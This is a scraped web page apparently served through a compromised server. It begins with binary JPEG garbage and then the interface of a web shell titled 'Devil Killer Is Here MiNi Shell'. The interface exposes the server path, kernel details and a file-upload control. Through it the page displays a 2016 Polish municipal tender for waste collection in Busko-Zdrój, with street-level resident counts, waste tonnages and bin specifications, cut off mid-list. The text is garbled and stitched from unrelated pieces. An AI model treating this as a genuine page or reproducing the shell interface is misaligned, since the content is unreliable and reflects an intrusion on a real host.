JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160411/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20160411/83182-N-2016.html

<p class="kh_header"><b>Busko-Zdrój: Odbiór i zagospodarowanie odpadów komunalnych z nieruchomości zamieszkałych z terenu gminy Busko-Zdrój</b><br>
<b>Numer ogłoszenia: 83182 - 2016; data zamieszczenia: 11.04.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Burmistrz Miasta i Gminy , ul. Adama Mickiewicza 10, 28-100 Busko-Zdrój, woj. świętokrzyskie, tel. 041 3705200, faks 041 3705290.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.umig.busko.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Odbiór i zagospodarowanie odpadów komunalnych z nieruchomości zamieszkałych z terenu gminy Busko-Zdrój.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Szczegółowy opis przedmiotu zamówienia
1.1 Na podstawie zawartej umowy wykonawca w cenie ryczałtowej wykona kompleksową obsługę   w zakresie odbioru i zagospodarowania (odzysk lub unieszkodliwianie) odpadów komunalnych z terenu miasta  Busko-Zdrój oraz 47 sołectw: Baranów, Bilczów, Biniątki, Błoniec, Bronina, Budzyń, Chotelek, Dobrowoda, Elżbiecin, Galów, Gadawa, Janina, Kameduły, Kawczyce, Kołaczkowice, Kostki Duże, Kostki Małe, Kotki, Las Winiarski, Łagiewniki, Mikułowice, Młyny, Nowy Folwark, Nowa Wieś, Oleszki, Olganów, Owczary, Palonki, Pęczelice, Podgaje, Radzanów, Ruczynów, Siesławice, Skorzów, Słabkowice, Służów, Skotniki Duże, Skotniki Małe, Szaniec, Szczaworyż, Wełecz, Widuchowa, Wolica, Zbludowice, Zbrodzice, Zwierzyniec i Żerniki Górne. Odbiór i zagospodarowanie odpadów komunalnych dotyczy wszystkich nieruchomości, na których zamieszkują mieszkańcy, w sposób zapewniający osiągnięcie odpowiednich poziomów recyklingu, przygotowania do ponownego użycia i odzysku innymi metodami oraz ograniczenie masy odpadów komunalnych ulegających biodegradacji przekazywanych do składowania, zgodnie z zapisami ustawy z dnia 13 września 1996r. o utrzymaniu czystości i porządku w gminach (Dz.U.2013.1399 j.t. z późn. zm), zapisami w wojewódzkim Planie Gospodarki Odpadami, przyjętym uchwałą Sejmiku Województwa Świętokrzyskiego Nr XXI/360/12 z dnia 28 czerwca 2012 r. (z późn. zm.) oraz Regulaminem utrzymania czystości i porządku na terenie gminy Busko-Zdrój. Obsługa obejmuje także jednorazową dostawę pojemników do selektywnej zbiórki odpadów komunalnych frakcji suchej i mokrej do punktów gromadzenia odpadów na nieruchomościach zabudowy wielorodzinnej oraz ciągłej dostawy worków do selektywnej  zbiórki odpadów komunalnych frakcji suchej i mokrej na tereny nieruchomości jednorodzinnych i zagrodowych do wszystkich odbiorców deklarujących selektywne gromadzenie odpadów wskazanych przez Zamawiającego.
2. Szczegółowe dane charakteryzujące wielkość zamówienia
2.1 Charakterystyka ogólna gminy:
1) Powierzchnia gminy Busko-Zdrój  wynosi 23 588 ha. Teren zabudowany ~ 460 ha.
2) Liczba mieszkańców gminy Busko-Zdrój wynosi ~ 32 148 osób, z czego  w zabudowie jednorodzinnej 22 727 a w zabudowie wielorodzinnej 9 421.
3) Liczba budynków w gminie Busko-Zdrój wynosi 6 149, z czego 152 to budynki wielomieszkaniowe, a 5 997 to budynki jednorodzinne.
4.2. Szacunkowe dane charakteryzujące poszczególne miejscowości  i ulice:
Miejscowość Ulica Liczba budynków Liczba osób  zameldowanych
Busko-Zdrój
1-go Maja
8
34
Busko-Zdrój
12-go Stycznia
18
57
Busko-Zdrój
Adama Mickiewicza
16
437
Busko-Zdrój
Adolfa Dygasińskiego
53
204
Busko-Zdrój
Armii Krajowej
8
28
Busko-Zdrój
Armii Ludowej
9
45
Busko-Zdrój
Bajkowa
11
52
Busko-Zdrój
Batalionów Chłopskich
1
5
Busko-Zdrój
Biwakowa
1
3
Busko-Zdrój
Boczna
3
44
Busko-Zdrój
Bohaterów Warszawy
77
335
Busko-Zdrój
Bohaterów Westerplatte
11
44
Busko-Zdrój
Bolesława Prusa
30
134
Busko-Zdrój
Ceglana
18
58
Busko-Zdrój
Cypriana Kamila Norwida
5
17
Busko-Zdrój
Dr Leopolda Byrkowskiego
2
5
Busko-Zdrój
Działkowicza
6
19
Busko-Zdrój
Elizy Orzeszkowej
17
53
Busko-Zdrój
Fryderyka Chopina
8
34
Busko-Zdrój
Gaik
13
43
Busko-Zdrój
Grotta
8
36
Busko-Zdrój
Grunwaldzka
42
154
Busko-Zdrój
Gwardii Ludowej
13
65
Busko-Zdrój
Henryka Sienkiewicza
5
17
Busko-Zdrój
Hołdu Pruskiego
22
117
Busko-Zdrój
Jabłoniowa
11
36
Busko-Zdrój
Jagiellońska
22
111
Busko-Zdrój
Jana Kilińskiego
16
45
Busko-Zdrój
Jana Kochanowskiego
16
51
Busko-Zdrój
Janusza Korczaka
25
95
Busko-Zdrój
Janusza Kusocińskiego
22
79
Busko-Zdrój
Jasna
16
57
Busko-Zdrój
Jaśminowa
3
10
Busko-Zdrój
Jodłowa
2
5
Busko-Zdrój
Juliusza Słowackiego
31
145
Busko-Zdrój
Kazimierza Wielkiego
21
67
Busko-Zdrój
Klonowa
3
7
Busko-Zdrój
Kolonia Górka
7
97
Busko-Zdrój
Królowej Jadwigi
41
181
Busko-Zdrój
Krótka
13
47
Busko-Zdrój
Krystyny Jamroz
1
1
Busko-Zdrój
Księdza Kardynała Wyszyńskiego
26
77
Busko-Zdrój
Kwiatowa
12
54
Busko-Zdrój
Lipowa
1
2
Busko-Zdrój
Ludwika Waryńskiego
38
166
Busko-Zdrój
Ładna
9
34
Busko-Zdrój
Łagiewnicka
58
199
Busko-Zdrój
Mała
5
15
Busko-Zdrój
Mariana Langiewicza
36
136
Busko-Zdrój
Marii Dąbrowskiej
14
40
Busko-Zdrój
Marii Konopnickiej
12
54
Busko-Zdrój
Mikołaja Kopernika
9
76
Busko-Zdrój
Mikołaja Reja
5
23
Busko-Zdrój
Mikułowicka
14
38
Busko-Zdrój
Młyńska
41
166
Busko-Zdrój
Morelowa
1
3
Busko-Zdrój
Nadole
34
114
Busko-Zdrój
Niwa
12
48
Busko-Zdrój
Objazdowa
30
123
Busko-Zdrój
Ogrodowa
26
99
Busko-Zdrój
Orzechowa
4
11
Busko-Zdrój
Osiedle Generała Andersa
7
1054
Busko-Zdrój
Osiedle Kazimierza Pułaskiego
10
693
Busko-Zdrój
Osiedle Legionów Polskich
7
197
Busko-Zdrój
Osiedle Leszka Czarnego  
1
149
Busko-Zdrój
Osiedle Marszałka Piłsudskiego
14
1455
Busko-Zdrój
Osiedle Sikorskiego
22
2528
Busko-Zdrój
Osiedle Świerczewskiego
17
1147
Busko-Zdrój
Osiedle Tadeusza Kościuszki
15
839
Busko-Zdrój
Parkingowa
2
7
Busko-Zdrój
Partyzantów
100
352
Busko-Zdrój
Pawia
7
33
Busko-Zdrój
Piekarska
4
10
Busko-Zdrój
Plac Targowy
4
11
Busko-Zdrój
Plac Zwycięstwa
19
138
Busko-Zdrój
Podpułkownika Srogiego
11
37
Busko-Zdrój
Polna
11
36
Busko-Zdrój
Poprzeczna
2
2
Busko-Zdrój
Promyk
13
33
Busko-Zdrój
Rehabilitacyjna
5
194
Busko-Zdrój
Rajskie Ogrody
1
4
Busko-Zdrój
Rokosza
38
173
Busko-Zdrój
Romana Dmowskiego
6
19
Busko-Zdrój
Rotm. Witolda Pileckiego
2
16
Busko-Zdrój
Różana
7
28
Busko-Zdrój
Sady
2
5
Busko-Zdrój
Sądowa
10
114
Busko-Zdrój
Sezamkowa
5
13
Busko-Zdrój
Siesławska
9
29
Busko-Zdrój
Skałki
12
50
Busko-Zdrój
Słoneczna
15
59
Busko-Zdrój
Sole
15
64
Busko-Zdrój
Spacerowa
9
44
Busko-Zdrój
Stanisława Moniuszki
8
45
Busko-Zdrój
Stanisława Staszica
20
96
Busko-Zdrój
Stawowa
50
183
Busko-Zdrój
Stefana Batorego
28
123
Busko-Zdrój
Stefana Żeromskiego
22
77
Busko-Zdrój
Szaniecka
8
32
Busko-Zdrój
Szarych Szeregów
2
4
Busko-Zdrój
Szydłowska
41
163
Busko-Zdrój
Tadeusza Kościuszki
16
48
Busko-Zdrój
Targowa
1
8
Busko-Zdrój
Tęczowa
2
5
Busko-Zdrój
Uchnasta
2
7
Busko-Zdrój
Widuchowska
62
243
Busko-Zdrój
Wieniawskiego
6
31
Busko-Zdrój
Wincentego Witosa
42
168
Busko-Zdrój
Wiosenna
8
32
Busko-Zdrój
Władysława Broniewskiego
12
36
Busko-Zdrój
Władysława Stanisława Reymonta
30
98
Busko-Zdrój
Wojska Polskiego
86
314
Busko-Zdrój
Wrzosowa
5
15
Busko-Zdrój
Zachodnia
7
21
Busko-Zdrój
Zacisze
7
25
Busko-Zdrój
Zielona
3
12
Busko-Zdrój
Złota
4
11
Busko-Zdrój
Źródlana
12
41
Baranów

42
121
Bilczów

84
343
Biniątki
49
189
Błoniec
14
72
Bronina
125
447
Budzyń
36
137
Chotelek
76
319
Dobrowoda
121
476
Elżbiecin
23
74
Gadawa
26
84
Galów
129
479
Janina
115
410
Kameduły
37
161
Kawczyce
35
137
Kołaczkowice
141
485
Kostki Duże
68
280
Kostki Małe
43
182
Kotki
100
426
Las Winiarski
35
149
Łagiewniki
155
560
Mikułowice
281
1057
Młyny
134
526
Nowa Wieś
22
101
Nowy Folwark
85
356
Oleszki
43
220
Olganów
77
308
Owczary
Brzozowa
14
45
Owczary
Cicha
8
40
Owczary
Dębowa
21
93
Owczary
Długa
80
336
Owczary
Pęczelicka
1
4
Owczary
Piaskowa
32
109
Owczary
Przemysłowa
11
41
Owczary
Rekreacyjna
5
15
Owczary
Świerkowa
13
51
Owczary
Zastawie
13
47
Palonki
50
212
Pęczelice
34
122
Podgaje
65
263
Radzanów
89
326
Ruczynów
47
208
Siesławice
229
886
Skorzów
55
231
Skotniki Duże
80
311
Skotniki Małe
52
204
Słabkowice
60
241
Służów
42
140
Szaniec
199
651
Szczaworyż
72
256
Wełecz
154
621
Widuchowa
171
663
Wolica
58
231
Zbludowice
Ceglana
10
30
Zbludowice
Dworska
11
39
Zbludowice
Korczyńska
55
230
Zbludowice
Krakowska
37
152
Zbludowice
Leśna
37
136
Zbludowice
Owczarska
3
11
Zbludowice
Przemysłowa
1
2
Zbludowice
Rehabilitacyjna
11
45
Zbludowice
Sosnowa
9
30
Zbludowice
Starkiewicza
16
59
Zbludowice
Strażacka
4
16
Zbludowice
Świętokrzyska
62
265
Zbludowice
Wiślica
5
20
Zbludowice
Wiśniowa
13
40
Zbludowice
Zdrojowa
18
70
Zbludowice
Zielona
9
37
Zbrodzice
57
161
Zwierzyniec
31
124
Żerniki Górne
81
312
W trakcie trwania zamówienia przewiduje się wzrost liczby budynków oraz liczby mieszkańców o około 5%.
W celu poprawnej wyceny zadania wykonawca zapozna się ze specyfiką i ukształtowaniem terenu gminy Busko-Zdrój.
2.3 Rodzaj i ilość odpadów zebranych w obecnym systemie łącznie z nieruchomościami niezamieszkałymi wynosiła w 2015 r:
10 01 01 - 23,2 Mg,
15 01 01 - 1,3 Mg,
15 01 02 - 3,0 Mg,
15 01 06 - 2 800,5 Mg,
15 01 07 - 0,1 Mg,
16 01 03 - 40,5 Mg,
17 01 01 - 346,7 Mg,
19 12 12 - 2 252,2 Mg,
20 01 21* - 0,2 Mg,
20 01 23* - 4,2 Mg,
20 01 28 - 0,1 Mg,
20 01 32 - 0,1 Mg,
20 01 34 - 0,1 Mg,
20 01 35* - 16,2 Mg,
20 01 36 - 6,5 Mg,
20 02 01 - 74,8 Mg,
20 02 02 - 33,0 Mg,
20 03 01 - 730,7 Mg,
20 03 03 - 163,6 Mg,
20 03 07 - 31,9 Mg.
2.4 Częstotliwość odbioru odpadów określona w Regulaminie utrzymania czystości i porządku na terenie gminy Busko-Zdrój, tj.
1) z obszarów zabudowy jednorodzinnej na terenie miasta :
a) odpady zmieszane - 2 razy w miesiącu,
b) odpady frakcji pozostałej po selekcji - 2 razy w miesiącu,
c) odpady frakcji suchej - 2 razy w miesiącu,
d) odpady frakcji mokrej - w okresie letnim 2 razy w miesiącu i w okresie zimowym 1 raz w miesiącu,
e) odpady elektryczno - elektroniczne - 2 razy na rok,
f) odpady niebezpieczne - 2 razy na rok,
g) odpady wielkogabarytowe - 2 razy na rok;
2) z obszarów zabudowy wielorodzinnej na terenie miasta
a) odpady zmieszane - wg potrzeb, nie rzadziej niż raz w tygodniu,
b) odpady frakcji pozostałej po selekcji - wg potrzeb, nie rzadziej niż raz w tygodniu,
c)  odpady frakcji suchej - 1 raz na tydzień,
d)  odpady frakcji mokrej - wg potrzeb, nie rzadziej niż 1 raz w tygodniu w okresie letnim oraz raz na dwa tygodnie w okresie zimowym,
e) odpady elektryczno - elektroniczne - 2 razy na rok,
f) odpady niebezpieczne - 2 razy na rok,
g) odpady wielkogabarytowe - 2 razy na rok;
3) z obszarów zabudowy zagrodowej i jednorodzinnej na terenie wsi:
a) odpady zmieszane - 1 raz w miesiącu,
b) odpady frakcji pozostałej po selekcji - 1 raz w miesiącu,
c) odpady frakcji suchej - 1 raz w miesiącu,
d) odpady frakcji mokrej - 1 raz w miesiącu,
e) odpady elektryczno - elektroniczne - 2 razy na rok,
f) odpady niebezpieczne - 2 razy na rok,
g) odpady wielkogabarytowe - 2 razy na rok;
4) z obszarów zabudowy wielorodzinnej na terenie wsi:
a) odpady zmieszane - 1 raz w miesiącu,
b) odpady frakcji pozostałej po selekcji - 1 raz w miesiącu,
c) odpady frakcji suchej - 1 raz w miesiącu,
d) odpady frakcji mokrej - 1 raz w miesiącu w okresie zimowym i 2 razy w miesiącu w okresie letnim,
e) odpady elektryczno - elektroniczne - 2 razy na rok,
f) odpady niebezpieczne - 2 razy na rok,
g) odpady wielkogabarytowe - 2 razy na rok.
2.5 Charakterystyka urządzeń do  gromadzenia odpadów na nieruchomościach zamieszkałych:
1) Niesegregowane (zmieszane) odpady komunalne
Niesegregowane (zmieszane) odpady komunalne oraz odpady pozostałe po segregacji gromadzone będą w pojemnikach należących do właścicieli nieruchomości o pojemnościach 110 l, 1100 l i 7000 l dowolnego koloru.
2) Selektywnie zbierane odpady komunalne
Selektywna zbiórka odpadów komunalnych na terenie zabudowy jednorodzinnej i zagrodowej będzie się odbywała w systemie workowym. Wprowadza się dwa rodzaje worków:
żółty - do gromadzenia odpadów frakcji suchej, do której zalicza się: papier i tekturę, metal, szkło i tworzywa sztuczne, które mogą być gromadzone łącznie lub osobno;
brązowy - do gromadzenia odpadów frakcji mokrej, do której zalicza się odpady ulegające biodegradacji (w szczególności odpady kuchenne i spożywcze oraz odpady zielone).
Selektywna zbiórka odpadów komunalnych na terenie zabudowy wielorodzinnej będzie się odbywała w systemie pojemnikowym. Wprowadza się dwa rodzaje pojemników:
żółty - do gromadzenia odpadów frakcji suchej, do której zalicza się: papier i tekturę, metal, szkło i tworzywa sztuczne, które mogą być gromadzone łącznie lub osobno;
brązowy - do gromadzenia odpadów frakcji mokrej, do której zalicza się odpady ulegające biodegradacji (w szczególności odpady kuchenne i spożywcze oraz odpady zielone).
Worki i pojemniki zapewnia wykonawca w cenie ryczałtowej.
3) Odpady niebezpieczne
Selektywna zbiórka odpadów niebezpiecznych (np. leki i opakowania po nich, świetlówki, baterie, chemikalia i opakowania po nich) zarówno w zabudowie jednorodzinnej, zagrodowej i wielorodzinnej odbywała się będzie w systemie  workowym. Przezroczysty worek o dowolnej pojemności (w zależności od ilości posiadanych odpadów niebezpiecznych) zapewnia  właściciel odpadów. Odbiór tych odpadów będzie się odbywać poprzez odbieranie wystawionych odpadów niebezpiecznych przez właścicieli przed swoimi nieruchomościami lub w miejscach wyznaczonych przez zarządcę nieruchomości.
4) Odpady wielkogabarytowe i wyeksploatowany sprzęt elektryczny i elektroniczny
Odbiór odpadów wielkogabarytowych i wyeksploatowanego sprzętu elektrycznego i elektronicznego będzie się odbywać poprzez odbieranie wystawionych ww. odpadów przez właścicieli przed swoimi nieruchomościami lub w miejscach wyznaczonych przez
zarządcę nieruchomości. Odpadów tych nie umieszcza się  w workach ani pojemnikach.
5) Charakterystyka worków do selektywnej zbiórki odpadów z nieruchomości zabudowy jednorodzinnej i zagrodowej:
Worki z folii polietylenowej LDPE wykonane zgodnie z obowiązującymi normami i o następujących parametrach:
a) na frakcję suchą - w kolorze żółtym o pojemności 120 l przezroczyste z nadrukiem *papier, metal, szkło, plastik*, o grubości minimum 0,06 mm
b) na frakcję mokrą - w kolorze brązowym o pojemności 60 l z nadrukiem *odpady ulegające biodegradacji* o grubości minimum 0,15 mm
c) ponadto worki winny być  oznaczone  nazwą  i  logiem  Gminy  Busko-Zdrój
d)  nadruk na workach jednostronny, kolor nadruku czarny, powierzchnia nadruku  około 1500 cm2
e) szacunkowa ilość worków do selektywnego zbierania odpadów wyniesie około 800 000 sztuk.
6) Charakterystyka pojemników do selektywnej zbiórki odpadów z nieruchomości zabudowy wielorodzinnej.
Pojemniki do selektywnej zbiórki odpadów komunalnych (frakcja mokra i frakcja sucha) powinny być o profilu zamkniętym, zgodnie z obowiązującymi normami i o następujących parametrach:
a) na frakcję suchą pojemnik czterokołowy o pojemności 1100 l lub dwukołowy o pojemności 110 l w kolorze żółtym, z nadrukiem *papier, metal, szkło, plastik*;
b) na frakcję mokrą pojemnik czterokołowy o pojemności 1100 l lub dwukołowy o pojemności 110 l w kolorze brązowym,  z nadrukiem *odpady ulegające biodegradacji*;
c) ponadto pojemniki powinny  być  oznaczone  nazwą  i  logiem  Gminy  Busko-Zdrój;     
d)  nadruk na pojemnikach  jednostronny, kolor nadruku czarny, powierzchnia nadruku do 2 000 cm2;
e) szacunkowa ilość pojemników wyniesie około 70 zestawów (2 pojemniki w zestawie) o pojemności 1100 l i około 15 zestawów (2 pojemniki w zestawie) o pojemności 110 l.
3. Szczegółowe wymagania stawiane wykonawcy odbierającemu odpady komunalne od właścicieli nieruchomości zamieszkałych w gminie Busko-Zdrój.
1. Wykonawca zobowiązany jest do:
1) opracowania i uzgodnienia z Zamawiającym szczegółowych harmonogramów odbioru odpadów, harmonogram powinien odpowiadać następującym wytycznym:
a) powinien być sformułowany w sposób przejrzysty, jasny, pozwalający na szybkie zorientowanie się co do konkretnych dat odbierania odpadów, jak też regularności i powtarzalności odbierania odpadów poszczególnych frakcji;
b) nie powinien zawierać żadnych dodatkowych treści ponad informacje związane z wykonywaniem zamówienia, w szczególności reklam, informacji propagandowych itd;
c) powinien wskazywać na daty odbierania poszczególnych frakcji odpadów z nieruchomości.
2) powiadamiania wszystkich właścicieli na terenie miasta I sołectw o w/w harmonogramach, w tym celu wykonawca sporządza harmonogramy odbioru, w formie kolorowych wydruków oraz publikuje je na swojej stronie internetowej; ponadto wykonawca dostarcza Zamawiającemu harmonogramy    w formie elektronicznej, które Zamawiający publikuje na stronie internetowej www.umig.busko.pl;
3) terminowego i właściwego odbioru odpadów komunalnych z nieruchomości według ustalonych harmonogramów;
4) niezwłocznego informowania Zamawiającego i właścicieli nieruchomości zamieszkałych o zmianach harmonogramów lub niemożności dostosowania się do ich wykonania;
5) wyposażenia miejsc selektywnego gromadzenia odpadów w zasobach wielomieszkaniowych w niezbędną ilość pojemników oraz właścicieli nieruchomości z obszarów zabudowy jednorodzinnej i zagrodowej w niezbędną ilość worków dostosowaną do potrzeb mieszkańców w terminie od dnia podpisania umowy do dnia 30 czerwca  2016 r..
Wykonawca  zobowiązany  jest   do  wyposażania właścicieli nieruchomości w worki 120 l oraz 60 l z folii LDPE przeznaczone do gromadzenia poszczególnych frakcji odpadów (frakcja sucha i mokra) w dniu odbierania odpadów.
Wykonawca ma obowiązek prowadzenia ciągłej ewidencji wydawanych worków w formie tabelarycznej z wyszczególnieniem adresu, pod który je dostarczono.
W przypadku, gdy mieszkaniec zgłosi zapotrzebowanie na dodatkowe worki, wykonawca ma obowiązek wydać je i zanotować to w prowadzonej ewidencji.
6) wyposażenia w trakcie wykonywania umowy zgłoszonych przez Zamawiającego nowych miejsc gromadzenia odpadów w niezbędne pojemniki lub worki w terminie niezwłocznym i odbioru odpadów począwszy od pierwszego tygodnia następującego po tygodniu, w którym nowe miejsce zostało zgłoszone przez Zamawiającego.
Zamawiający drogą elektroniczną informuje wykonawcę o nowych adresach nieruchomości, gdzie mają zostać dostarczone worki bądź pojemniki do selektywnej zbiorki odpadów (frakcji suchej i mokrej) w związku ze złożonymi deklaracjami przez właścicieli nieruchomości zamieszkałych.
7) odpowiadania za stan techniczny i sanitarny pojemników dostarczonych w ramach zawartej z Zamawiającym umowy w celu gromadzenia selektywnie zebranych odpadów (frakcja sucha i mokra) i ich napraw, systematycznych konserwacji, mycia i dezynfekcji oraz wymiany uszkodzonych lub zniszczonych pojemników, we własnym zakresie oraz na wezwanie Zamawiającego.
8) ubezpieczenia na własny koszt pojemników celem zabezpieczenia ich od ryzyka związanego z uszkodzeniem lub kradzieżą.
9) wymiany pojemnika na mniejszy lub większy na uzasadniony wniosek właściciela bądź zarządzającego nieruchomościami wielorodzinnymi i powiadamiania Zamawiającego o konieczności takiej zmiany i o każdej dokonanej zmianie;
10) odbierania odpadów komunalnych:
a) w sposób ciągły, nie zakłócający ciszy nocnej;
b) w terminach wynikających z przyjętego harmonogramu odbioru;
c) niezależnie od warunków atmosferycznych;
d) pojazdami przystosowanymi do odbierania poszczególnych frakcji odpadów, w sposób wykluczający mieszanie odpadów;
e) pojazdami bezpylnymi z grzebieniowym i widłowym mechanizmem załadowczym.
11) odebrania wszystkich odpadów komunalnych wytworzonych na terenie wszystkich nieruchomości, na których zamieszkują mieszkańcy, zgromadzonych w pojemnikach i workach spełniających wymagania określone w Regulaminie utrzymania czystości i porządku na terenie gminy Busko-Zdrój, w tym wyselekcjonowanych rodzajowo, a w szczególności opakowań szklanych.
12) odbierania odpadów w sposób zapewniający utrzymanie odpowiedniego stanu sanitarnego, w szczególności:
a) zapobiegania wysypywaniu się odpadów z pojemników i worków podczas dokonywania odbioru;
b) uprzątnięcia i odbierania odpadów z miejsc ich gromadzenia, w tym także tych, które nie zostały umieszczone w pojemnikach;
c) zbierania i odbierania odpadów z miejsc gromadzenia odpadów, również w przypadku, gdy ich wysypanie nie nastąpiło w trakcie odbierania.
13) każdorazowego informowania Zamawiającego o stwierdzeniu nieprzestrzegania sposobu gromadzenia odpadów przez właściciela nieruchomości zamieszkałych na terenie gminy określonego w deklaracji.
Wykonawca w takich przypadkach zobowiązany jest do udokumentowania zdarzeń poprzez wykonanie:
a) notatki z opisem niezgodności i adresem nieruchomości, podpisanej czytelnie przez pracowników wykonawcy, którzy stwierdzili niezgodność;
b) zdjęć przedstawiających niezgodność.
Sposób udokumentowania nieprawidłowości powinien jednoznacznie potwierdzać wystąpienie niezgodności i identyfikować adres nieruchomości oraz datę.
